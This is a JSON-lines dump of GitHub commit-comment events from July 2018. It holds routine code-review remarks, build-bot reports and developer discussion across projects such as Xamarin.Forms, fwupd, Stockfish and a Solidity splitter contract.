{"id":"8020988839","type":"CommitCommentEvent","actor":{"login":"capraynor"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":29839893,"position":9,"line":213,"path":"Xamarin.Forms.Platform.iOS/ViewRenderer.cs","commit_id":"1a70c1325b2ab202d2153c4bb016812f6d526477","created_at":"2018-07-26T07:43:24Z","updated_at":"2018-07-26T07:43:24Z","author_association":"NONE","body":"This line of code causes my UI Automation Test (appium) cannot get the child element of a listview.\r\n\r\nIt seems that we shouldn't set the \"uiview.IsAccessibilityElement\" to true.\r\n\r\n> The default value for this property is false unless the receiver is a standard UIKit control, in which case the value is true.\r\n\r\n> Assistive applications can get information only about objects that are represented by accessibility elements. Therefore, if you implement a custom control or view that should be accessible to users with disabilities, set this property to true. The only exception to this practice is a view that merely serves as a container for other items that should be accessible. Such a view should implement the UIAccessibilityContainer protocol and set this property to false.\r\n\r\nSo, when using listview, the listview itself is an AccessibilityElement, and its child elements are ignored by accessibility tools."}},"created_at":"2018-07-26T07:43:24Z"}
{"id":"8020989387","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29839894,"position":24,"line":24,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"0507096fcd142af805b3a74f4f8f09b1277aaa87","created_at":"2018-07-26T07:43:32Z","updated_at":"2018-07-26T07:43:32Z","author_association":"NONE","body":"Тут у нас проверяется, есть ли стороны с длинной ниже 0. Правильней назвать переменную invalid_sides or has_invalid_sides"}},"created_at":"2018-07-26T07:43:32Z"}
{"id":"8020989546","type":"CommitCommentEvent","actor":{"login":"hughsie"},"repo":{"name":"hughsie/fwupd"},"payload":{"comment":{"id":29839896,"position":null,"line":null,"path":null,"commit_id":"1974de1b9c80eaf6507c4fa95bc4a15a4d62f607","created_at":"2018-07-26T07:43:34Z","updated_at":"2018-07-26T07:43:34Z","author_association":"OWNER","body":"Why 1s? Can't we do a delay of 20ms with 50 retries?"}},"created_at":"2018-07-26T07:43:34Z"}
{"id":"8020990311","type":"CommitCommentEvent","actor":{"login":"kidandcat"},"repo":{"name":"peers/peerjs"},"payload":{"comment":{"id":29839897,"position":null,"line":null,"path":null,"commit_id":"73d9173c3ee15d49862d22c19c87c6c70465edab","created_at":"2018-07-26T07:43:43Z","updated_at":"2018-07-26T07:43:43Z","author_association":"MEMBER","body":"0.3.16, I'm sorry I forgot to update it on the library"}},"created_at":"2018-07-26T07:43:43Z"}
{"id":"8020994342","type":"CommitCommentEvent","actor":{"login":"hughsie"},"repo":{"name":"hughsie/fwupd"},"payload":{"comment":{"id":29839903,"position":5,"line":250,"path":"plugins/thunderbolt/fu-plugin-thunderbolt.c","commit_id":"1443d5558ff5748804cb9bf0b5e305b247d6cbe3","created_at":"2018-07-26T07:44:41Z","updated_at":"2018-07-26T07:44:41Z","author_association":"OWNER","body":"It's usually error_foo rather than foo_error. "}},"created_at":"2018-07-26T07:44:41Z"}
{"id":"8020994357","type":"CommitCommentEvent","actor":{"login":"Jekaa"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29839904,"position":null,"line":null,"path":null,"commit_id":"de5ab6df47e9d0e522cccba1035a3b0258140f29","created_at":"2018-07-26T07:44:41Z","updated_at":"2018-07-26T07:44:41Z","author_association":"OWNER","body":"I was alarmed that the inclusion of the Queen's X-ray attacks only makes it worse"}},"created_at":"2018-07-26T07:44:41Z"}
{"id":"8020998149","type":"CommitCommentEvent","actor":{"login":"houjb"},"repo":{"name":"romanchereshnev/HuGaDB"},"payload":{"comment":{"id":29839913,"position":null,"line":null,"path":null,"commit_id":"f99dbf85b38e4cd79ccaec70ee12ae9d68f3ad22","created_at":"2018-07-26T07:45:31Z","updated_at":"2018-07-26T07:45:31Z","author_association":"NONE","body":"Thanks, I have another question. Can you provide a paper for gait analysis using this database?"}},"created_at":"2018-07-26T07:45:31Z"}
{"id":"8020998455","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29839914,"position":null,"line":null,"path":null,"commit_id":"42d8b1b147cff3f626d0768cb44dc1a8be156873","created_at":"2018-07-26T07:45:35Z","updated_at":"2018-07-26T07:45:35Z","author_association":"NONE","body":"158270028_Issue#6422 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2986 of 2986 tests passed, 14 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MTR small diffs.\n * 2 tests had: BND diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: RDD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T07:45:35Z"}
{"id":"8021000763","type":"CommitCommentEvent","actor":{"login":"capraynor"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":29839916,"position":9,"line":213,"path":"Xamarin.Forms.Platform.iOS/ViewRenderer.cs","commit_id":"1a70c1325b2ab202d2153c4bb016812f6d526477","created_at":"2018-07-26T07:46:04Z","updated_at":"2018-07-26T07:46:04Z","author_association":"NONE","body":"See: https://developer.apple.com/documentation/objectivec/nsobject/1615141-isaccessibilityelement"}},"created_at":"2018-07-26T07:46:04Z"}
{"id":"8021004384","type":"CommitCommentEvent","actor":{"login":"Nickbert7"},"repo":{"name":"MediaBrowser/plugin.video.emby"},"payload":{"comment":{"id":29839923,"position":null,"line":null,"path":null,"commit_id":"3d67b79138db61d790549d07aa20aaca36f8c72c","created_at":"2018-07-26T07:46:51Z","updated_at":"2018-07-26T07:46:51Z","author_association":"CONTRIBUTOR","body":"Are you sure the new URL will work?\r\nShouldn't it look like this:\r\n\"https://raw.githubusercontent.com/MediaBrowser/plugin.video.emby/develop/kodi_icon.png\""}},"created_at":"2018-07-26T07:46:51Z"}
{"id":"8021006207","type":"CommitCommentEvent","actor":{"login":"winonecheng"},"repo":{"name":"tp6m3bj6/X-Village-HW1"},"payload":{"comment":{"id":29839927,"position":21,"line":21,"path":"Complete.py","commit_id":"80e19267d25ae0855351a7fccd0b7ba8f00a287e","created_at":"2018-07-26T07:47:17Z","updated_at":"2018-07-26T07:47:17Z","author_association":"NONE","body":"這個命名不太好，依 convention 來看，變數要小寫，然後要有意義"}},"created_at":"2018-07-26T07:47:17Z"}
{"id":"8021006900","type":"CommitCommentEvent","actor":{"login":"capraynor"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":29839930,"position":9,"line":213,"path":"Xamarin.Forms.Platform.iOS/ViewRenderer.cs","commit_id":"1a70c1325b2ab202d2153c4bb016812f6d526477","created_at":"2018-07-26T07:47:26Z","updated_at":"2018-07-26T07:47:26Z","author_association":"NONE","body":"And the workaround is set, \r\nAutomationProperties.IsInAccessibleTree to false\r\nfor listview in xamarin.forms"}},"created_at":"2018-07-26T07:47:26Z"}
{"id":"8021009313","type":"CommitCommentEvent","actor":{"login":"debendralimex"},"repo":{"name":"debendralimex/Magento-1.9-Customer-Log-Details"},"payload":{"comment":{"id":29839938,"position":null,"line":null,"path":null,"commit_id":"f43c508faab46b514ae806e07427347ca38f12bc","created_at":"2018-07-26T07:48:00Z","updated_at":"2018-07-26T07:48:00Z","author_association":"OWNER","body":"This module will help you to track the customer viewing pages. there will be created 2 log files under the var/log folder.\r\n\r\n1 - For customer\r\n2 - For admin\r\n\r\nLog file data of customer_login.log will be look like\r\n\r\n#1::  IP: ::1, Customer Email: customeremailId@gmail.com, Controller - customer_account_loginPost, Current url: http://localhost/magento196/index.php/customer/account/login/\r\n\r\nIf customer face any login issues then one email will send to the admin.\r\n\r\n"}},"created_at":"2018-07-26T07:48:00Z"}
{"id":"8021013189","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29839945,"position":5,"line":12,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/route.rb","commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-26T07:48:52Z","updated_at":"2018-07-26T07:48:52Z","author_association":"OWNER","body":"ispravil"}},"created_at":"2018-07-26T07:48:52Z"}
{"id":"8021013684","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29839946,"position":5,"line":15,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/station.rb","commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-26T07:48:58Z","updated_at":"2018-07-26T07:48:58Z","author_association":"OWNER","body":"ispravil"}},"created_at":"2018-07-26T07:48:58Z"}
{"id":"8021014151","type":"CommitCommentEvent","actor":{"login":"dastanabeuov"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29839948,"position":5,"line":18,"path":"1-Osnovy-Ruby-polnaya-PO/lesson6/train.rb","commit_id":"28abe27ad4f597627f609a821058babe267c5afb","created_at":"2018-07-26T07:49:05Z","updated_at":"2018-07-26T07:49:05Z","author_association":"OWNER","body":"ispravil"}},"created_at":"2018-07-26T07:49:05Z"}
{"id":"8021016325","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29839954,"position":null,"line":null,"path":null,"commit_id":"a67315d714db773a77cafab9807cc9859c38a74b","created_at":"2018-07-26T07:49:33Z","updated_at":"2018-07-26T07:49:33Z","author_association":"NONE","body":"develop (mjwitte) - Win64-Windows-7-VisualStudio-14: OK (2322 of 2322 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a67315d714db773a77cafab9807cc9859c38a74b-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T07:49:33Z"}
{"id":"8021018865","type":"CommitCommentEvent","actor":{"login":"unaheidi"},"repo":{"name":"unaheidi/examples-in-python"},"payload":{"comment":{"id":29839964,"position":4,"line":38,"path":"k-nearest-neighbors/regression.py","commit_id":"c2eaf868d9ea0184b736f974c198ecbac6cc46a6","created_at":"2018-07-26T07:50:08Z","updated_at":"2018-07-26T07:50:08Z","author_association":"OWNER","body":"a"}},"created_at":"2018-07-26T07:50:08Z"}
{"id":"8021019259","type":"CommitCommentEvent","actor":{"login":"simongoffin"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29839965,"position":null,"line":null,"path":null,"commit_id":"44bd29fc844cdb21b879144fda4dbb94c4afcd2c","created_at":"2018-07-26T07:50:13Z","updated_at":"2018-07-26T07:50:13Z","author_association":"CONTRIBUTOR","body":"Hello @diyautospec \r\n\r\nCan you send me the steps to reproduce the bug in runbot?\r\n\r\nRegards,"}},"created_at":"2018-07-26T07:50:13Z"}
{"id":"8021019805","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29839969,"position":37,"line":35,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"0507096fcd142af805b3a74f4f8f09b1277aaa87","created_at":"2018-07-26T07:50:20Z","updated_at":"2018-07-26T07:50:20Z","author_association":"NONE","body":"Не самый надежный способ. Если будет несколько одинаковых значений в массиве, то они все удалятся и дальше у нас методы будут валиться из-за неправильного кол-ва аргументов\r\n```\r\n2.1.3 :003 > [1, 1, 1, 3] - [1]\r\n => [3]\r\n2.1.3 :004 >\r\n```"}},"created_at":"2018-07-26T07:50:20Z"}
{"id":"8021021243","type":"CommitCommentEvent","actor":{"login":"masterdidoo"},"repo":{"name":"masterdidoo/wpftoolkit"},"payload":{"comment":{"id":29839973,"position":106,"line":187,"path":"ExtendedWPFToolkitSolution/Src/Xceed.Wpf.AvalonDock/Controls/LayoutAnchorableTabItem.cs","commit_id":"24ecc09cf35e7095ad02d0beecfd5bafd83d0658","created_at":"2018-07-26T07:50:39Z","updated_at":"2018-07-26T07:50:39Z","author_association":"OWNER","body":"Cannot be removed"}},"created_at":"2018-07-26T07:50:39Z"}
{"id":"8021021620","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29839974,"position":null,"line":null,"path":null,"commit_id":"42d8b1b147cff3f626d0768cb44dc1a8be156873","created_at":"2018-07-26T07:50:44Z","updated_at":"2018-07-26T07:50:44Z","author_association":"NONE","body":"158270028_Issue#6422 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42d8b1b147cff3f626d0768cb44dc1a8be156873-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T07:50:44Z"}
{"id":"8021024467","type":"CommitCommentEvent","actor":{"login":"unaheidi"},"repo":{"name":"unaheidi/examples-in-python"},"payload":{"comment":{"id":29839978,"position":5,"line":39,"path":"k-nearest-neighbors/regression.py","commit_id":"c2eaf868d9ea0184b736f974c198ecbac6cc46a6","created_at":"2018-07-26T07:51:20Z","updated_at":"2018-07-26T07:51:20Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-26T07:51:20Z"}
{"id":"8021024644","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29839979,"position":37,"line":35,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"0507096fcd142af805b3a74f4f8f09b1277aaa87","created_at":"2018-07-26T07:51:23Z","updated_at":"2018-07-26T07:51:23Z","author_association":"NONE","body":"`legs = sides.min(2)` - так будет по надежней, с учетом того, что triangle будет переименован в sides"}},"created_at":"2018-07-26T07:51:23Z"}
{"id":"8021025106","type":"CommitCommentEvent","actor":{"login":"unaheidi"},"repo":{"name":"unaheidi/examples-in-python"},"payload":{"comment":{"id":29839981,"position":5,"line":39,"path":"k-nearest-neighbors/regression.py","commit_id":"c2eaf868d9ea0184b736f974c198ecbac6cc46a6","created_at":"2018-07-26T07:51:29Z","updated_at":"2018-07-26T07:51:29Z","author_association":"OWNER","body":"hihi"}},"created_at":"2018-07-26T07:51:29Z"}
{"id":"8021025345","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29839982,"position":null,"line":null,"path":null,"commit_id":"95027d9dbdeb6f438fdc7596fdf5dc8166d57c35","created_at":"2018-07-26T07:51:32Z","updated_at":"2018-07-26T07:51:32Z","author_association":"COLLABORATOR","body":"@masc4ii: thanks for brief explanation of the pipeline used in the processing code.\r\n\r\n@bakersdozen: \r\n> Colorspace can get pretty overwhelming haha\r\nHehe right... I think linear rec709 could be data with linear tone curve and rec709 primaries."}},"created_at":"2018-07-26T07:51:32Z"}
{"id":"8021025857","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"megabytus/thinknetica_home_work"},"payload":{"comment":{"id":29839986,"position":38,"line":36,"path":"ruby_basics_part_1/right-angled_triangle.rb","commit_id":"0507096fcd142af805b3a74f4f8f09b1277aaa87","created_at":"2018-07-26T07:51:39Z","updated_at":"2018-07-26T07:51:39Z","author_association":"NONE","body":"Тут не нужны будут танцы с бубном"}},"created_at":"2018-07-26T07:51:39Z"}
{"id":"8021026389","type":"CommitCommentEvent","actor":{"login":"asmaulhasnat"},"repo":{"name":"asmaulhasnat/form_validation"},"payload":{"comment":{"id":29839988,"position":null,"line":null,"path":null,"commit_id":"c58e6cfb57b802f78840f14ed67721024193fbfa","created_at":"2018-07-26T07:51:46Z","updated_at":"2018-07-26T07:51:46Z","author_association":"OWNER","body":"password hide and show using html and js"}},"created_at":"2018-07-26T07:51:46Z"}
{"id":"8021026946","type":"CommitCommentEvent","actor":{"login":"masterdidoo"},"repo":{"name":"xceedsoftware/wpftoolkit"},"payload":{"comment":{"id":29839989,"position":106,"line":187,"path":"ExtendedWPFToolkitSolution/Src/Xceed.Wpf.AvalonDock/Controls/LayoutAnchorableTabItem.cs","commit_id":"24ecc09cf35e7095ad02d0beecfd5bafd83d0658","created_at":"2018-07-26T07:51:54Z","updated_at":"2018-07-26T07:51:54Z","author_association":"NONE","body":"Cannot be removed"}},"created_at":"2018-07-26T07:51:54Z"}
{"id":"8021028050","type":"CommitCommentEvent","actor":{"login":"nuxeh"},"repo":{"name":"nuxeh/url-bot-rs"},"payload":{"comment":{"id":29839992,"position":null,"line":null,"path":null,"commit_id":"1d9d120fb3a40558523086f517ac7c1692a45055","created_at":"2018-07-26T07:52:10Z","updated_at":"2018-07-26T07:52:10Z","author_association":"OWNER","body":"Nice, as it happens I've added logging to a sqlite database recently, needs a touch more work but could be in soon."}},"created_at":"2018-07-26T07:52:10Z"}
{"id":"8021029215","type":"CommitCommentEvent","actor":{"login":"unaheidi"},"repo":{"name":"unaheidi/examples-in-python"},"payload":{"comment":{"id":29839995,"position":15,"line":50,"path":"k-nearest-neighbors/regression.py","commit_id":"c2eaf868d9ea0184b736f974c198ecbac6cc46a6","created_at":"2018-07-26T07:52:26Z","updated_at":"2018-07-26T07:52:26Z","author_association":"OWNER","body":"hhvgj"}},"created_at":"2018-07-26T07:52:26Z"}
{"id":"8021030265","type":"CommitCommentEvent","actor":{"login":"nuxeh"},"repo":{"name":"nuxeh/url-bot-rs"},"payload":{"comment":{"id":29839996,"position":null,"line":null,"path":null,"commit_id":"1d9d120fb3a40558523086f517ac7c1692a45055","created_at":"2018-07-26T07:52:41Z","updated_at":"2018-07-26T07:52:41Z","author_association":"OWNER","body":"Having a database could also open up the possibility of other services being able to consume the data, for example generating per user and per channel playlists for a shout/icecast server..."}},"created_at":"2018-07-26T07:52:41Z"}
{"id":"8021031272","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29839998,"position":14,"line":24,"path":"contracts/Splitter.sol","commit_id":"c8ffbf73d32d0702543e9c6aa84c835c2778518c","created_at":"2018-07-26T07:52:55Z","updated_at":"2018-07-26T07:52:55Z","author_association":"NONE","body":"```solidity\r\nconstructor() public {\r\n}\r\n```\r\nachieves the same in fewer words."}},"created_at":"2018-07-26T07:52:55Z"}
{"id":"8021036613","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29840010,"position":27,"line":32,"path":"contracts/Splitter.sol","commit_id":"c8ffbf73d32d0702543e9c6aa84c835c2778518c","created_at":"2018-07-26T07:54:05Z","updated_at":"2018-07-26T07:54:05Z","author_association":"NONE","body":"`uint remainder = msg.value - 2*half;` is way cheaper in terms of gas."}},"created_at":"2018-07-26T07:54:05Z"}
{"id":"8021039540","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29840012,"position":null,"line":null,"path":null,"commit_id":"de5ab6df47e9d0e522cccba1035a3b0258140f29","created_at":"2018-07-26T07:54:43Z","updated_at":"2018-07-26T07:54:43Z","author_association":"NONE","body":"The problem of queen x-ray through other pieces seems using in the attack maps that counting a queen reaching this square (in real it can't reach it) triggers more powerful bonus (like queen safe check). And it needs at least two moves to swap the position of pieces (in practise  more). Perhaps its best to collected this info in a separate attack map and use them only at specific parts in the code."}},"created_at":"2018-07-26T07:54:43Z"}
{"id":"8021040847","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29840021,"position":29,"line":34,"path":"contracts/Splitter.sol","commit_id":"c8ffbf73d32d0702543e9c6aa84c835c2778518c","created_at":"2018-07-26T07:55:00Z","updated_at":"2018-07-26T07:55:00Z","author_association":"NONE","body":"Since `remainder` is most likely to be `0`, you should wrap this expensive write in a `if`."}},"created_at":"2018-07-26T07:55:00Z"}
{"id":"8021046108","type":"CommitCommentEvent","actor":{"login":"capraynor"},"repo":{"name":"xamarin/Xamarin.Forms"},"payload":{"comment":{"id":29840031,"position":9,"line":213,"path":"Xamarin.Forms.Platform.iOS/ViewRenderer.cs","commit_id":"1a70c1325b2ab202d2153c4bb016812f6d526477","created_at":"2018-07-26T07:56:05Z","updated_at":"2018-07-26T07:56:05Z","author_association":"NONE","body":"Thanks for your amazing work!\r\n\r\nAccording to your comment, you want to make every element accessible.\r\n\r\nBut in Apple's documentation for \"IsAccessibilityElement\" property, we should only set the user interaction elements' \"IsAccessibilityElement\" to true.\r\n\r\ne.g: for listview, in your code, the listview is an accessible element, and its child element are ignored by accessibility tool. The actual accessible element should be the listview's child element, but not the listview.\r\n\r\nIt costs me a lot of time to investigating why the listview children cannot access in appium.\r\nMaybe it is a bug in appium, or xamarin shouldn't set all the uiview.IsAccessibilityElement to true.\r\nI will report an issue for appium later."}},"created_at":"2018-07-26T07:56:05Z"}
{"id":"8021048286","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29840032,"position":8,"line":7,"path":"migrations/2_deploy_contracts.js","commit_id":"2acad21f51fa93e00be42aa5e1fab947a0a13127","created_at":"2018-07-26T07:56:35Z","updated_at":"2018-07-26T07:56:35Z","author_association":"NONE","body":"`SafeMath` is an internal library, so there is no actual linking."}},"created_at":"2018-07-26T07:56:35Z"}
{"id":"8021049119","type":"CommitCommentEvent","actor":{"login":"cyh-etlab"},"repo":{"name":"cyh-etlab/TemporaryFile"},"payload":{"comment":{"id":29840033,"position":null,"line":null,"path":null,"commit_id":"4e1f28ebe2ac1c40ddeddac3f5658964c7dffd53","created_at":"2018-07-26T07:56:46Z","updated_at":"2018-07-26T07:56:46Z","author_association":"OWNER","body":"main-1.c  , ARM mbed OS 5.9.1 移植在STM32F103C8，簡單按鍵中斷DEMO範例"}},"created_at":"2018-07-26T07:56:46Z"}
{"id":"8021051881","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/ASR"},"payload":{"comment":{"id":29840040,"position":null,"line":null,"path":null,"commit_id":"a8a3c0b36b5ecbdec8894969d772c2a7e9bde581","created_at":"2018-07-26T07:57:22Z","updated_at":"2018-07-26T07:57:22Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/ASR/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `8609da08-90a9-11e8-92e1-663ce43806ee`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-26T07:57:22Z"}
{"id":"8021054439","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"AirCow/ASR"},"payload":{"comment":{"id":29840045,"position":null,"line":null,"path":null,"commit_id":"8a43a61fa3bb68b20b078de5733d085087629791","created_at":"2018-07-26T07:57:54Z","updated_at":"2018-07-26T07:57:54Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/AirCow/ASR/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `99159466-90a9-11e8-99ab-1a94674fe929`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-26T07:57:54Z"}
{"id":"8021055879","type":"CommitCommentEvent","actor":{"login":"1458938801"},"repo":{"name":"1458938801/wlp"},"payload":{"comment":{"id":29840047,"position":null,"line":null,"path":null,"commit_id":"26d85d5f55de9569d31c3d863a38b2d4b850c718","created_at":"2018-07-26T07:58:11Z","updated_at":"2018-07-26T07:58:11Z","author_association":"OWNER","body":"#test"}},"created_at":"2018-07-26T07:58:11Z"}
{"id":"8021056950","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29840048,"position":14,"line":13,"path":"test/account-mgmt.test.js","commit_id":"2acad21f51fa93e00be42aa5e1fab947a0a13127","created_at":"2018-07-26T07:58:25Z","updated_at":"2018-07-26T07:58:25Z","author_association":"NONE","body":"This is unnecessary obfuscation, just do:\r\n\r\n```javascript\r\nsplitter = await Splitter.new({ from: accounts[0] });\r\n```"}},"created_at":"2018-07-26T07:58:25Z"}
{"id":"8021057861","type":"CommitCommentEvent","actor":{"login":"p0deje"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29840050,"position":6,"line":362,"path":"rb/lib/selenium/webdriver/remote/w3c/bridge.rb","commit_id":"da6efc1b1b4809e20930050fe3a369032d00e1b7","created_at":"2018-07-26T07:58:36Z","updated_at":"2018-07-26T07:58:36Z","author_association":"MEMBER","body":"Ok, a3d2f41cd392c9842e3b37be673ec0e287c58ce8 should do the trick. However, the test doesn't pass for old Firefox driver. Are you sure it worked fine?"}},"created_at":"2018-07-26T07:58:36Z"}
{"id":"8021059443","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29840051,"position":9,"line":21,"path":"test/account-mgmt.test.js","commit_id":"c8ffbf73d32d0702543e9c6aa84c835c2778518c","created_at":"2018-07-26T07:58:58Z","updated_at":"2018-07-26T07:58:58Z","author_association":"NONE","body":"`= web3.toWei(1)`."}},"created_at":"2018-07-26T07:58:58Z"}
{"id":"8021062566","type":"CommitCommentEvent","actor":{"login":"neuroscr"},"repo":{"name":"majestrate/llarp"},"payload":{"comment":{"id":29840055,"position":null,"line":null,"path":null,"commit_id":"4dd7b2843f49eec7779cb01f94ef46e1611fbfc9","created_at":"2018-07-26T07:59:39Z","updated_at":"2018-07-26T07:59:39Z","author_association":"CONTRIBUTOR","body":"We do need private interfaces IF they're in NAT mode"}},"created_at":"2018-07-26T07:59:39Z"}
{"id":"8021064324","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29840059,"position":14,"line":23,"path":"test/account-mgmt.test.js","commit_id":"c8ffbf73d32d0702543e9c6aa84c835c2778518c","created_at":"2018-07-26T08:00:02Z","updated_at":"2018-07-26T08:00:02Z","author_association":"NONE","body":"Less obfuscation:\r\n\r\n```javascript\r\nconst ethAmount = 1;\r\nconst weiAmount = web3.toWei(ethAmount);\r\n```"}},"created_at":"2018-07-26T08:00:02Z"}
{"id":"8021064521","type":"CommitCommentEvent","actor":{"login":"soniah"},"repo":{"name":"soniah/gosnmp"},"payload":{"comment":{"id":29840063,"position":null,"line":null,"path":null,"commit_id":"b788382e6de48bfd458a81bdb2321a80338002dc","created_at":"2018-07-26T08:00:05Z","updated_at":"2018-07-26T08:00:05Z","author_association":"OWNER","body":"Thanks!"}},"created_at":"2018-07-26T08:00:05Z"}
{"id":"8021070569","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29840074,"position":221,"line":169,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-26T08:01:11Z","updated_at":"2018-07-26T08:01:11Z","author_association":"CONTRIBUTOR","body":"Did you do something? The api links now appear within `<code>` elements, which works much better and maintains consistency with non-linked class/method/property names. I didn't do a pull, so I'm bemused about what changed :smile:\r\n\r\nThose macros would certainly be better, particularly when dealing with arguments (the URL syntax is horrible). Authors will still need to work out manually which reference docs to target, but I hope that's something that we can tackle down the line."}},"created_at":"2018-07-26T08:01:11Z"}
